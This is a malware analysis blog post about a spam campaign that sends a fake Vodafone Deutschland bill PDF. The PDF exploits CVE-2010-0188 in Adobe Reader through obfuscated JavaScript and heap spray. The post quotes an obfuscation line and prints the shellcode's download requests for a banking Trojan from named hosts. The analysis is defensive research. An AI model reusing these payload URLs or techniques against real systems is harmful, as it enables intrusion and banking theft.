An Analysis of a Fake Vodafone Bill PDF File
We haven't come across many malicious PDF files recently in our spam traps, so when we found this message, ostensibly from Vodafone Deutschland, we naturally took a closer look.
In this example, the cyber crooks are targeting Vodafone Deutschland customers by spamming a fake billing statement. The message claims to be from Vodafone-OnlineRechnung@vodafone.com.The spam may look harmless at first, especially given the links in the message point to the real Vodafone.de website. But the attached PDF file is indeed dangerous.
I tested the attached PDF file against PDF Score (a tool developed by our colleague Rodrigo Montoro a.k.a Sp0oKeR) and it showed a number of suspect elements inside the file. You may check out Rodrigo's presentation about "Scoring PDF Structure To Detect Malicious Files" at SOURCE 2012 in Seattle: http://www.youtube.com/watch?v=qNlZiB2wnEM
The malicious PDF file was crafted to exploit the Libtiff vulnerability (CVE-2010-0188) in Adobe Reader 9.3 and earlier. The exploit crashes Adobe Reader and executes the attacker's malicious code.
The PDF uses two layers of JavaScript obfuscation before triggering the exploit and executing its payload. The first JavaScript was embedded inside this compressed XFA (XML Forms Architecture) form.
The embedded data uses ZLIB compression, so decompressing was fairly easy. After scraping the compressed data out of the PDF file and some quick Python scripting, the malicious JavaScript lurking in the PDF file is revealed.
Here's the code which is easier on the eyes:
In the JavaScript code, the variable "a" references to the tag "/Keywords"
a=/*ebwfweng`*/t["ke"+"ywo"+"rds"].split('|')[0]["substr"](13);
The string inside "/Keyword" will be de obfuscated inside a FOR loop and afterwards will be executed using JavaScript's eval() function. The image below shows the "/Keywords" tag containing a string of obfuscated JavaScript code. The code's job is to heap spray the shellcode to Adobe Reader's heap.
And here's the full HEX decoded shellcode, notice a couple of URLs below:
The shellcode's ultimate intention is to download a couple of malicious file from the internet.
GET /stuff/corduroyshop/corduroyshop.exe Host:rocketmou.se (173.236.241.197:80)GET /mapa/images/mapa.exeHost: coachplay.co.il (173.236.217.119:80)
Both files are exactly the same executable from different URLs, perhaps for redundancy reasons. The malware is known as Bublik or Bebloh – a banking Trojan. https://www.virustotal.com/file/ffee98ae73c293f9fc4b2ab6076c64ad84256546cc97cb8eb572201d4a27c0d6/analysis/
The Bublik/Bebloh Trojan's payload connected to a command and control server and gathered email addresses in the infected machine by querying the WAB (Windows Address Book) registry. It disabled the Windows LUA(Least Privileged User Account) to run all applications (including the malware itself) as Administrator. It also changed the default browser to Internet Explorer in order to monitor the user's internet browsing habits and online banking.
Here's a TCP stream capture of the Trojan communicating to its command & control server at Trisi[.]net (94.249.209.21)
The WHOIS info of the Trojan's command & control server domain name shows that it was just created recently last 15th of November, hmmm interesting!
Inconclusion, sometimes it's quite hard to distinguish legitimate and malicious email and this spam campaign is an example. But if you're a Vodafone customer in Germany who regularly receives monthly bill statement through email, there is a high chance of being sucked in and opening the attached PDF file.
Because this malicious PDF file makes use of JavaScript to execute the exploit, the best thing to be protected is to disable JavaScript in your PDF reader and use the latest version. In Adobe Reader, you can disable JavaScript through Edit->Preference then uncheck Enable Acrobat JavaScript.
Fortunately, if you have the latest Adobe Reader XI installed in your computer, the exploit inside the malicious PDF file will be rendered useless. Better yet, use an alternative PDF reader.
Customers of Trustwave MailMarshal Secure Email Gateway are protected against this threat.